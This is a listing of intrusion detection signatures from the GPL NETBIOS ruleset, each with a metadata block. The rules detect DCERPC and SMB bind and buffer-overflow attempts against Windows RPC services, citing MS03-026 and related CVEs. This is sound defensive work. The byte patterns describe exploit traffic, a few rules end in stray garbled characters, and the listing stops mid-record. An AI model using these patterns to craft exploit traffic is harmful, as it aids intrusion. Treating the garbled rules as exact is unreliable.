alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IActivation little endian bind attempt"; flow:established,to_server; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; classtype:protocol-command-decode; sid:2103276; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103198

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator path overflow attempt big endian"; flow:to_server,established; content:"|05|"; byte_test:1,<,16,3,relative; content:"|5C 00 5C 00|"; byte_test:4,>,256,-8,relative; flowbits:isset,dce.isystemactivator.bind; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103198; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator path overflow attempt big endian

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103197

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator path overflow attempt little endian"; flow:to_server,established; content:"|05|"; byte_test:1,&,16,3,relative; content:"|5C 5C|"; byte_test:4,>,256,-8,little,relative; flowbits:isset,dce.isystemactivator.bind; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103197; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator path overflow attempt little endian

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103238

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_test:4,>,128,0,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103238; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103239

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_test:4,>,128,0,little,relative; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103239; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103236

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC irot bind attempt"; flow:established,to_server; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103236; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : DCERPC irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103237

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC irot little endian bind attempt"; flow:established,to_server; content:"|05|"; depth:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103237; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : DCERPC irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103156

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue bind attempt"; flow:to_server,established; content:"|05|"; depth:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103156; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103157

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue little endian bind attempt"; flow:to_server,established; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103157; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103195

#alert tcp $EXTERNAL_NET any -> $HOME_NET 137 (msg:"GPL NETBIOS name query overflow attempt TCP"; flow:to_server,established; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; metadata: former_category NETBIOS; reference:bugtraq,9624; reference:cve,2003-0825; classtype:attempted-admin; sid:2103195; rev:5; metadata:created_at 2010_09_23, updated_at 2017_11_10;)

Name : name query overflow attempt TCP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2017-11-10

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103180

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103180; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103430

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103430; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103181

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103181; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103431

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103431; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103182

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103182; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103432

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103432; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103381

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103381; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103382

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103382; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103383

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103383; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103384

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103384; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103397

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103397; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103398

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103398; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103399

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103399; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103400

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103400; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103260

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103260; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

